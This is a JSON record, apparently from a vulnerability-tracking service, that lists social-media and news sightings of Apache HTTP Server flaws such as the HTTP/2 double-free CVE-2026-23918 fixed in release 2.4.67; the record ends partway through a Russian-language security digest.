{"vulnerability": "cve-2026-2391", "sightings": [{"uuid": "60f6544f-e8cd-487c-a79b-89c3c6e6897a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-2391", "type": "seen", "source": "https://gist.github.com/harupy/8205ee018b031d5a4991b34d2f42bed9", "content": "", "creation_timestamp": "2026-02-19T12:48:01.000000Z"}, {"uuid": "9af2a6b5-dcf7-4c91-8b78-a5658ef17b7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-2391", "type": "seen", "source": "https://gist.github.com/alon710/c6963cc90ba7a2a5c311d6e3cd8e6558", "content": "", "creation_timestamp": "2026-02-12T17:40:24.000000Z"}, {"uuid": "fc1192ca-f039-4085-9a5b-73c334ede5d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23919", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3mhvcqd54ze2r", "content": "", "creation_timestamp": "2026-03-25T14:35:06.876641Z"}, {"uuid": "fec581d5-ea41-4c2c-9a3c-2474400818a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/thehackerwire.bsky.social/post/3ml23ey76qf2z", "content": "\ud83d\udfe0 CVE-2026-23918 - High (8.8)\n\nDouble Free and possible RCE vulnerability in Apache HTTP Server with the HTTP/2 protocol.\n\nThis ...\n\nhttps://www.thehackerwire.com/vulnerability/CVE-2026-23918/\n\n#infosec #cybersecurity #CVE #vulnerability #security #patchstack", "creation_timestamp": "2026-05-04T16:22:24.480065Z"}, {"uuid": "412277f4-d2ca-48f6-b880-681b2f191cbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://infosec.exchange/users/harrysintonen/statuses/116517446102524326", "content": "Several vulnerabilities in #Apache HTTP Server 2.4 have been fixed in release 2.4.67. The most severe of these are:\n- CVE-2026-23918: Apache HTTP Server: http2: double free and possible RCE on early reset\n- CVE-2026-24072: Apache HTTP Server: mod_rewrite elevation of privileges via ap_expr\n- CVE-2026-33006: Apache HTTP Server: mod_auth_digest timing attack\nhttps://httpd.apache.org/security/vulnerabilities_24.html\n#CVE_2026_23918 #CVE_2026_24072 #CVE_2026_33006 #infosec #cybersecurity", "creation_timestamp": "2026-05-04T17:18:52.927565Z"}, {"uuid": "1ce6f8ad-1df6-467e-a1fa-81959c8c1e9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3ml2a7f5yvr2e", "content": "CVE-2026-23918: Apache HTTP Server: http2: double free and possible RCE on early reset", "creation_timestamp": "2026-05-04T17:48:44.658063Z"}, {"uuid": "71374c87-71f4-42dd-90f7-2dad8c556b5f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/omo.bsky.social/post/3ml2ljesytc2o", "content": "Apache HTTP Server\u306e\u8106\u5f31\u6027(Important: CVE-2026-23918, Moderate: CVE-2026-24072, CVE-2026-33006, Low:\u8907\u6570)\u30682.4.67\u30ea\u30ea\u30fc\u30b9\n\n#sios_tech #security #vulnerability #\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3 #\u8106\u5f31\u6027 #apache #struts\n\nsecurity.sios.jp/vulnerabilit...", "creation_timestamp": "2026-05-04T21:11:14.606959Z"}, {"uuid": "4f09d65c-4fec-45f2-9d4f-4eb473092d95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/securestep9.bsky.social/post/3ml45bb4yih24", "content": "#Apache HTTP Server Vulnerability CVE-2026-23918 Exposes Millions of Servers to Remote Code Execution Attacks.\nAnyone running Apache httpd version 2.4.66 or earlier are strongly urged to upgrade immediately!\n\n\ud83d\udc47", "creation_timestamp": "2026-05-05T12:01:29.862971Z"}, {"uuid": "2fccdaee-3bd7-4567-b2df-257988b21652", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/hmier.bsky.social/post/3ml45f7nvfk2f", "content": "high risk CVE-2026-23918 in Apache HTTP Server HTTP/2 implementation.\n\ncc @levhita.net", "creation_timestamp": "2026-05-05T12:03:38.617483Z"}, {"uuid": "cd4313b1-90f1-4ad1-a1b1-af575257907f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/o2cloud.bsky.social/post/3ml4fuvyyd22w", "content": "\ud83d\udd17 CVE : CVE-2026-23918, CVE-2026-24072, CVE-2026-28780, CVE-2026-29168, CVE-2026-29169, CVE-2026-33006, CVE-2026-33007, CVE-2026-33523, CVE-2026-33857, CVE-2026-34032, CVE-2026-34059", "creation_timestamp": "2026-05-05T14:35:36.033419Z"}, {"uuid": "302c819a-9dd1-4d78-872e-c69a2a9460a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/slackers.it/post/3ml2v2l43l42x", "content": "8/11\n\nhttps://www.cve.org/CVERecord?id=CVE-2026-28780\n    https://www.cve.org/CVERecord?id=CVE-2026-24072\n    https://www.cve.org/CVERecord?id=CVE-2026-23918\n  (* Security fix *)\nn/krb5-1.22.2-x86_64-2.txz:  Rebuilt.\n  Harden perms on /usr/bin/ksu.", "creation_timestamp": "2026-05-05T00:01:53.001722Z"}, {"uuid": "b0fb3d40-2f37-461d-a183-a8ac8c4ba195", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/bitnami.bsky.social/post/3ml4itn3i4s2z", "content": "23 hours. That's how long it took Bitnami to go from a critical Apache RCE disclosure (CVE-2026-23918) to fully patched container images for Apache, WordPress, Drupal, Moodle, Matomo, and phpMyAdmin.\n\nHere's the full breakdown: community.broadcom.com/tanzu/blogs/...", "creation_timestamp": "2026-05-05T15:28:36.275046Z"}, {"uuid": "e18f0032-9430-47f0-92e6-af4c76772daa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/2rZiKKbOU3nTafniR2qMMSE0gwZ.activitypub.awakari.com.ap.brid.gy/post/3ml4n4zvkivu2", "content": "Critical Apache HTTP/2 Flaw (CVE-2026-23918) Enables DoS and Potential RCE The Apache Software Foundation (ASF) has released security updates to address several security vulnerabilities in the HTTP...\n\n\nOrigin | Interest | Match", "creation_timestamp": "2026-05-05T16:46:28.377626Z"}, {"uuid": "233b72b5-dfd0-420f-9590-0278785d8f29", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://t.me/GithubRedTeam/82941", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a cve-2026-23918\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a sibersan\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-05 15:56:29\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nPython tools to audit Apache HTTP Server for CVE-2026-23918 (HTTP/2 RCE) and four related CVEs. Passive and local scanners.   Read-only auditing toolkit for the May 2026 Apache HTTPD security advisory (CVE-2026-23918 and 4 others).\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-05T16:00:05.000000Z"}, {"uuid": "f272093b-8c99-45a5-99fe-84c7b6b8954e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/cybersecurity0001.bsky.social/post/3ml4o7mhv4h2z", "content": "Critical Apache HTTP/2 Flaw (CVE-2026-23918) Enables DoS and Potential RCE", "creation_timestamp": "2026-05-05T17:04:44.940295Z"}, {"uuid": "4b623ef3-45bc-429d-a838-92e7bbf37ac4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/thedailytechfeed.com/post/3ml4ohk3krx2b", "content": "Critical #Apache HTTP Server update released! Patch CVE-2026-23918 to prevent potential RCE attacks. Upgrade to version 2.4.67 now! #CyberSecurity #InfoSec #RCE Link: thedailytechfeed.com/critical-apa...", "creation_timestamp": "2026-05-05T17:09:10.577497Z"}, {"uuid": "5a9af20a-e70a-4bfb-a369-9c4be7813888", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3ml4pcbq5od2b", "content": "Critical Apache HTTP/2 Flaw (CVE-2026-23918) Enables DoS and Potential RCE", "creation_timestamp": "2026-05-05T17:24:07.945150Z"}, {"uuid": "1bf396e5-27cb-4c4c-b3fb-d33b7169bedc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/it4intserver.bsky.social/post/3ml4puiyibt2h", "content": "iT4iNT SERVER Critical Apache HTTP/2 Flaw (CVE-2026-23918) Enables DoS and Potential RCE VDS VPS Cloud #Apache #HTTP2 #CVE202623918 #CyberSecurity #RCE", "creation_timestamp": "2026-05-05T17:34:21.430904Z"}, {"uuid": "972af01d-8151-4f89-a307-a7f1ffcb9034", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3ml3cthchsr2i", "content": "Critical Apache HTTP Server Flaw Exposes Millions of Servers to RCE Attacks: A Technical Deep Dive into CVE-2026-23918 +\u00a0Video\n\nIntroduction: A critical remote code execution (RCE) vulnerability, designated CVE-2026-23918 and rated High with a CVSS base score of 8.8, has been discovered in the\u2026", "creation_timestamp": "2026-05-05T04:08:26.721217Z"}, {"uuid": "eb048eda-a7b9-485a-a31f-f817a25bc985", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://t.me/ctinow/249784", "content": "Critical Apache HTTP/2 Flaw (CVE-2026-23918) Enables DoS and Potential RCE\nhttps://ift.tt/zVb4ZwY", "creation_timestamp": "2026-05-05T16:49:29.000000Z"}, {"uuid": "28360498-b53c-4410-b062-ad4621ac2eb0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://t.me/cibsecurity/89315", "content": "\ud83d\udd8b\ufe0f Critical Apache HTTP/2 Flaw (CVE-2026-23918) Enables DoS and Potential RCE \ud83d\udd8b\ufe0f\n\nThe Apache Software Foundation ASF has released security updates to address several security vulnerabilities in the HTTP Server, including a severe vulnerability that could potentially lead to remote code execution RCE. The vulnerability, tracked as CVE202623918 CVSS score 8.8, has been described as a case of \"double free and possible RCE\" in the HTTP2 protocol handling. This issue.\n\n\ud83d\udcd6 Read more.\n\n\ud83d\udd17 Via \"The Hacker News\"\n\n----------\n\ud83d\udc41\ufe0f Seen on @cibsecurity", "creation_timestamp": "2026-05-05T16:45:07.000000Z"}, {"uuid": "07f31542-5533-48bc-b9de-6d1aee369d9b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://bsky.app/profile/hendryadrian.bsky.social/post/3ml4rdb22vn2a", "content": "Apache HTTP Server patch 2.4.67 fixes a critical HTTP/2 double-free flaw (CVE-2026-23918) in mod_http2 allowing DoS and possible remote code execution via crafted HTTP/2 frames. #ApachePatch #HTTP2Bug #Poland", "creation_timestamp": "2026-05-05T18:00:28.115235Z"}, {"uuid": "c834df2d-2b7c-4f10-b537-8ae72e5e7030", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://thehackernews.com/2026/05/critical-apache-http2-flaw-cve-2026.html", "content": "The Apache Software Foundation (ASF) has released security updates to address several security vulnerabilities in the HTTP Server, including a severe vulnerability that could potentially lead to remote code execution (RCE).\nThe vulnerability, tracked as CVE-2026-23918 (CVSS score: 8.8), has been described as a case of \"double free and possible RCE\" in the HTTP/2 protocol handling. This issue", "creation_timestamp": "2026-05-05T14:19:00.000000Z"}, {"uuid": "d77e179c-30e8-495a-a098-0ad7da56c5c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://infosec.exchange/users/patrickcmiller/statuses/116526030575901645", "content": "Critical Apache HTTP/2 Flaw (CVE-2026-23918) Enables DoS and Potential RCE https://thehackernews.com/2026/05/critical-apache-http2-flaw-cve-2026.html", "creation_timestamp": "2026-05-06T05:42:03.380884Z"}, {"uuid": "6e2d5446-a025-4cc7-8373-8548384bfa1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-23918", "type": "seen", "source": "https://t.me/true_secator/8179", "content": "\u041f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u043c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0442\u044c \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0432\u0430\u0436\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438 \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u043d\u0438\u043c\u0438 \u0443\u0433\u0440\u043e\u0437\u044b, \u043d\u0430 \u0442\u0435\u043a\u0443\u0449\u0438\u0439 \u043c\u043e\u043c\u0435\u043d\u0442 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044f \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0430\u044f:\n\n1. \u0412 Android \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, CVE-2026-0073, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0439 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442 \u041e\u0421 \u0438 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u043e\u0439 \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0438 \u0431\u0435\u0437 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u043d\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u0431\u0435\u0437 \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c.\u00a0\n\n\u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 adbd (Android Debug Bridge daemon), \u0444\u043e\u043d\u043e\u0432\u044b\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441, \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0438\u0439 \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u0445 Android \u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u044e\u0449\u0438\u0439 \u0441\u0432\u044f\u0437\u044c\u044e \u043c\u0435\u0436\u0434\u0443 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e\u043c \u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043e\u043c, \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0438\u0432\u0430\u044f \u043e\u0442\u043b\u0430\u0434\u043a\u0443 \u0438 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u043e\u0439 \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0435.\n\n\u041f\u043e\u043a\u0430 \u043a\u0430\u043a\u0438\u0445-\u043b\u0438\u0431\u043e \u043f\u0440\u0438\u0437\u043d\u0430\u043a\u043e\u0432 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2026-0073 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u0432 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445 \u043d\u0435\u0442, \u043d\u043e \u044d\u0442\u043e \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u043e\u043a\u0430.\n\n2. Apache \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0431\u043e\u043b\u0435\u0435 \u0447\u0435\u043c \u0434\u0435\u0441\u044f\u0442\u043a\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 HTTP Server \u0438 MINA, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0438 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u0435 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u043b\u0438 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u044b \u0434\u043b\u044f RCE.\n\n\u0412 Apache HTTP Server 2.4.67 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043e \u0434\u043b\u044f 11 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, 10 \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044e\u0442 \u0432\u0441\u0435 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0435 \u0432\u0435\u0440\u0441\u0438\u0438.\n\n\u041f\u0435\u0440\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c - CVE-2026-23918, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u043e\u0448\u0438\u0431\u043a\u0443 \u0434\u0432\u043e\u0439\u043d\u043e\u0433\u043e \u043e\u0441\u0432\u043e\u0431\u043e\u0436\u0434\u0435\u043d\u0438\u044f \u043f\u0430\u043c\u044f\u0442\u0438 \u0438 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0435 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043a\u043e\u0434\u0430 \u0432 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0435 HTTP/2. \u0418\u043d\u0438\u0446\u0438\u0438\u0440\u0443\u044f \u043f\u0440\u0435\u0436\u0434\u0435\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e\u0435 \u0441\u0431\u0440\u043e\u0441, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0432\u044b\u0437\u0432\u0430\u0442\u044c DoS \u0438 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434.\n\n\u0414\u0440\u0443\u0433\u0430\u044f, CVE-2026-28780, \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0431\u0443\u0444\u0435\u0440\u0430 \u0432 \u043a\u0443\u0447\u0435, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 AJP-\u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f, \u0432\u044b\u0437\u044b\u0432\u0430\u044f DoS \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u044f \u043a\u043e\u0434.\n\n\u0422\u0440\u0438 \u0434\u0440\u0443\u0433\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, CVE-2026-29168, CVE-2026-29169 \u0438 CVE-2026-33007, \u043c\u043e\u0433\u0443\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a DoS, \u0430 \u0435\u0449\u0435 \u0447\u0435\u0442\u044b\u0440\u0435 (CVE-2026-24072, CVE-2026-33857, CVE-2026-34032 \u0438 CVE-2026-34059) - \u043c\u043e\u0433\u0443\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438.\n\n\u041e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0442\u0430\u043a\u0436\u0435 \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e\u0439 \u043d\u0435\u0439\u0442\u0440\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u043e\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0435\u0439 CRLF (CVE-2026-33523), \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043c\u0430\u043d\u0438\u043f\u0443\u043b\u0438\u0440\u043e\u0432\u0430\u0442\u044c HTTP-\u043e\u0442\u0432\u0435\u0442\u0430\u043c\u0438, \u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0443\u044e \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043f\u043e\u0431\u043e\u0447\u043d\u044b\u0445 \u043a\u0430\u043d\u0430\u043b\u043e\u0432 \u043f\u043e \u0432\u0440\u0435\u043c\u0435\u043d\u0438 (CVE-2026-33006), \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u043e\u0431\u0445\u043e\u0434\u0443 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 Digest.\n\n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, Apache\u00a0\u043e\u0431\u044a\u044f\u0432\u0438\u043b\u0430\u00a0\u043e \u0432\u044b\u043f\u0443\u0441\u043a\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439 MINA 2.2.7 \u0438 MINA 2.1.12, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0445 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0434\u0432\u0443\u0445 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 - CVE-2026-42778 \u0438 CVE-2026-42779. \n\n\u041f\u0435\u0440\u0432\u0430\u044f - \u044d\u0442\u043e \u043d\u0435\u043f\u043e\u043b\u043d\u043e\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043b\u044f CVE-2026-41409, \u043a\u043e\u0442\u043e\u0440\u0430\u044f, \u0432 \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c, \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u0435\u043f\u043e\u043b\u043d\u044b\u043c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u0434\u043b\u044f CVE-2024-52046, \u043d\u0435\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0439 \u0434\u0435\u0441\u0435\u0440\u0438\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0434\u0430\u043d\u043d\u044b\u0445, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0434\u043b\u044f RCE.\n\n\u0412\u0442\u043e\u0440\u0430\u044f - \u043d\u0435\u043f\u043e\u043b\u043d\u043e\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 